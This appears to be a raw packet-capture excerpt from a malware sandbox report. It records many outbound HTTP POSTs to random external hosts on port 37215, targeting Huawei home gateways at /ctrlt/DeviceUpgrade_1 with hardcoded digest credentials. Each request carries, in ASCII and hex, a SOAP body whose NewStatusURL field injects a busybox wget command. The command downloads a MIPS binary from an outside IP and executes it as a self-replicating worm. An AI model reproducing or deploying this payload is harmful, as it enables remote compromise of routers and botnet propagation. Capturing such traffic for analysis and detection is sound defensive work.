                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1990192.168.2.2347496197.110.31.5637215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:47:04.592920065 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1991192.168.2.235130825.221.62.21537215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:47:04.592931986 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1992192.168.2.2336270173.217.98.10237215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:47:04.592978001 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1993192.168.2.2337632128.87.137.10037215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:47:04.592993021 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1994192.168.2.2351576157.108.235.19337215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:47:04.592993021 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1995192.168.2.2351162197.185.159.24937215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:47:04.593010902 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1996192.168.2.2347810101.209.202.16437215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:47:04.593010902 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1997192.168.2.234769095.116.2.24937215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:47:04.593036890 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1998192.168.2.234667441.231.161.15137215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:47:04.593137980 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1999192.168.2.2352244157.168.57.6137215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:47:04.593147993 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2000192.168.2.2353034157.195.189.5137215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:47:04.593149900 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
